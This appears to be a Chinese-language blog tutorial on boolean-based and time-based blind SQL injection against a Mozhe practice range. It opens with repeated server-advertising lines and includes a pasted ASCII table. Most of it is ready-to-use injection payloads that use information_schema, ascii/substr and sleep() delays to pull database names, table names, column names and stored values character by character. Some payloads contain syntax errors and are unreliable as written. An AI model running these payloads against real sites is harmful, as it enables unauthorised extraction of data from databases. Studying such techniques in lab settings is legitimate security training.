SQL注入&盲注&延时

蓝易云高性能服务器

|

|

|

|

|

😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘
😝😝😝😝😝😝点击购买吧-年份送定制U盘

|

|

|

|

|

布尔注入

猜库位

我们还是通过墨者里面的靶场来进行布尔注入

首先我们一样

要发现他是存在注入点的

and 1=2

那么判断字段呢可以先放下先

我们判断出他存在注入点

那么下面就是猜的库名

怎么猜呢

我们布尔注入是先猜他的库名是几个字母几个特殊字符的

and length(database())=23

假设我们的当时数据库的

库名为

bezr

那么我们的注入语句就是

and length(database())=4

这个语句的意思是

我猜他的库名为四个字母或者说我猜他的库名为四个特殊字符，再或者说我猜他的库名占四位

那么我们这样去注入的话

他是正常显示的

并不会报错或者异常回显

因为我们猜的是正确的

使用是正常回显

如果猜的是错误的

比如

and length(database())=9

这就错误了

因为我们的库名是4位的

现在猜9位所有是错误的，所以报错

这就是我们在逻辑上的猜库名有几位‘

猜库位的字母或者特殊字符

and left(database(),1)='m'

这个就是猜库名的

第一位的第一个字母，或者是第一个特殊字符他等于那个

他是等于m的

那么如果我们猜错了他会异常回显

或者不显示

那么如果我们猜对了

他的回显就是正常的

如果说你要猜第二位置上的是什么

也一样

and left(database(),2)='o'

猜表的数量

and 1>2 or (select count(*) from information_schema.tables where table_schema=database())='2'

and 1=2 or (select count(*) from information_schema.tables where table_schema=database())='2'

猜第表有几位

and 1>2 or length((select table_name from information_schema.tables where table_schema=database()limit)0,1))='17'

and 1=2 or length((select table_name from information_schema.tables where table_schema=database()limit)0,1))='17'

猜表的第一个字母或者第一个特殊字符

and ascii(substr((select table_name from information_schema.tables where table_schema="mozhe_Discuz_StormGroup"limit 0,1),1,1))=83

二进制	十进制	十六进制	字符/缩写	解释
00000000	0	00	NUL (NULL)	空字符
00000001	1	01	SOH (Start Of Headling)	标题开始
00000010	2	02	STX (Start Of Text)	正文开始
00000011	3	03	ETX (End Of Text)	正文结束
00000100	4	04	EOT (End Of Transmission)	传输结束
00000101	5	05	ENQ (Enquiry)	请求
00000110	6	06	ACK (Acknowledge)	回应/响应/收到通知
00000111	7	07	BEL (Bell)	响铃
00001000	8	08	BS (Backspace)	退格
00001001	9	09	HT (Horizontal Tab)	水平制表符
00001010	10	0A	LF/NL(Line Feed/New Line)	换行键
00001011	11	0B	VT (Vertical Tab)	垂直制表符
00001100	12	0C	FF/NP (Form Feed/New Page)	换页键
00001101	13	0D	CR (Carriage Return)	回车键
00001110	14	0E	SO (Shift Out)	不用切换
00001111	15	0F	SI (Shift In)	启用切换
00010000	16	10	DLE (Data Link Escape)	数据链路转义
00010001	17	11	DC1/XON (Device Control 1/Transmission On)	设备控制1/传输开始
00010010	18	12	DC2 (Device Control 2)	设备控制2
00010011	19	13	DC3/XOFF (Device Control 3/Transmission Off)	设备控制3/传输中断
00010100	20	14	DC4 (Device Control 4)	设备控制4
00010101	21	15	NAK (Negative Acknowledge)	无响应/非正常响应/拒绝接收
00010110	22	16	SYN (Synchronous Idle)	同步空闲
00010111	23	17	ETB (End of Transmission Block)	传输块结束/块传输终止
00011000	24	18	CAN (Cancel)	取消
00011001	25	19	EM (End of Medium)	已到介质末端/介质存储已满/介质中断
00011010	26	1A	SUB (Substitute)	替补/替换
00011011	27	1B	ESC (Escape)	逃离/取消
00011100	28	1C	FS (File Separator)	文件分割符
00011101	29	1D	GS (Group Separator)	组分隔符/分组符
00011110	30	1E	RS (Record Separator)	记录分离符
00011111	31	1F	US (Unit Separator)	单元分隔符
00100000	32	20	(Space)	空格
00100001	33	21	!
00100010	34	22	"
00100011	35	23	#
00100100	36	24	$
00100101	37	25	%
00100110	38	26	&
00100111	39	27	’
00101000	40	28	(
00101001	41	29	)
00101010	42	2A	*
00101011	43	2B	+
00101100	44	2C	,
00101101	45	2D	-
00101110	46	2E	.
00101111	47	2F	/
00110000	48	30	0
00110001	49	31	1
00110010	50	32	2
00110011	51	33	3
00110100	52	34	4
00110101	53	35	5
00110110	54	36	6
00110111	55	37	7
00111000	56	38	8
00111001	57	39	9
00111010	58	3A	:
00111011	59	3B	;
00111100	60	3C	<
00111101	61	3D	=
00111110	62	3E	>
00111111	63	3F	?
01000000	64	40	@
01000001	65	41	A
01000010	66	42	B
01000011	67	43	C
01000100	68	44	D
01000101	69	45	E
01000110	70	46	F
01000111	71	47	G
01001000	72	48	H
01001001	73	49	I
01001010	74	4A	J
01001011	75	4B	K
01001100	76	4C	L
01001101	77	4D	M
01001110	78	4E	N
01001111	79	4F	O
01010000	80	50	P
01010001	81	51	Q
01010010	82	52	R
01010011	83	53	S
01010100	84	54	T
01010101	85	55	U
01010110	86	56	V
01010111	87	57	W
01011000	88	58	X
01011001	89	59	Y
01011010	90	5A	Z
01011011	91	5B	[
01011100	92	5C	\
01011101	93	5D	]
01011110	94	5E	^
01011111	95	5F	_
01100000	96	60	`
01100001	97	61	a
01100010	98	62	b
01100011	99	63	c
01100100	100	64	d
01100101	101	65	e
01100110	102	66	f
01100111	103	67	g
01101000	104	68	h
01101001	105	69	i
01101010	106	6A	j
01101011	107	6B	k
01101100	108	6C	l
01101101	109	6D	m
01101110	110	6E	n
01101111	111	6F	o
01110000	112	70	p
01110001	113	71	q
01110010	114	72	r
01110011	115	73	s
01110100	116	74	t
01110101	117	75	u
01110110	118	76	v
01110111	119	77	w
01111000	120	78	x
01111001	121	79	y
01111010	122	7A	z
01111011	123	7B	{
01111100	124	7C	|
01111101	125	7D	}
01111110	126	7E	~
01111111	127	7F	DEL (Delete)	删除

猜字段名字

and ascii(substr((select column_name from information_schema.columns
where table_name=‘获取到的表名’ and table_schema=‘获取到的数据库名’ limit
0,1),第一个位置,1))>97

and ascii(substr((select column_name from information_schema.columns where table_name='StormGroup_member' and table_schema='mozhe_Discuz_StormGroup' limit 0,1),1,1))>104

猜值

and ascii(substr((select concat(字段名) from 数据库名.表名limit 0,1),1,1))>108

and ascii(substr((select concat(name) from mozhe_Discuz_StormGroup.StormGroup_member limit 0,1),1,1))>108

延时注入

延时注入很简单

就是延长了时间

进行回显

and if(1=1,sleep(5),0)

用时6.92秒

那么我们现在延时五秒

那么在什么情况下会延时5秒呢

那就是在正确的情况下了

就是你猜的正确的情况下，他就会执行你的要求，你的要求就是延迟5秒或者更久的时间

最后时间是

11秒多

那么11-6等于5

那么就是延迟了5秒

说明我猜的是正确的

延时注入判断数据库名长度

and if(length(database())=23,sleep(10),1)

and if(length(database())=你猜他的库名是多少位,sleep(延迟多少秒),第一个数据库名)

17秒

这个秒数呢虽然不是非常准确

但是凭感觉就知道是不是正确的了

mozhe_Discuz_StormGroup

延时注入判断当前数据库名

and if(ascii(substr(database(),1,1))=ascii值,1,sleep(延时多少))

and if(ascii(substr(database(),1,0))=109,1,sleep(10))

延时注入判断表名

and if((select ascii(substr((select table_name from information_schema.tables where table_schema="mozhe_Discuz_StormGroup"limit 0,1),1,1)))='105',sleep(30),0)

参考一下吧

猜字段语句：
?id=1' and if((select ascii(substr((select column_name from information_schema.columns where table_name="表名"limit 0,1),N,1)))=101,0,sleep(5))-- -
 
 
猜数据：
 and if((select ascii(substr((select 字段名 from 库名.表名 limit 0,1),N,1)))=101,0,sleep(5))